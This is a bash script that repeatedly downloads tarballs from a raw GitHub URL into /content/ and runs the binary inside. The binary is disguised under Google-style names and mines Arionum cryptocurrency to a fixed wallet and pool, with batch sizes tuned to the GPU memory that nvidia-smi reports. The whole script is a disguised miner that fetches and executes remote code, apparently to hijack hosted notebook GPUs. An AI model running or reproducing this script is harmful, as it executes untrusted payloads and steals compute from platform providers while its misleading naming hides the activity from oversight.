apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

while true
do

arr[0]="http://mine.arionumpool.com"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

string=$(curl -s -A "miner" http://mine.arionumpool.com/mine.php?q=info)
if [[ $string == *"16384"* ]]; then

cd /content/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/devdeploy84.tar.gz
tar -xvf ./devdeploy84.tar.gz

cd googleapps8474

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 830
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 622
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 416
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 207
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 2488));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 102
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi



else

cd /content/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux847412741274.tar.gz
tar -xvf ./linux847412741274.tar.gz

cd googleapps8474

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 29
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 20
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 13
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 7
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 2488));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 2
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi



fi

done
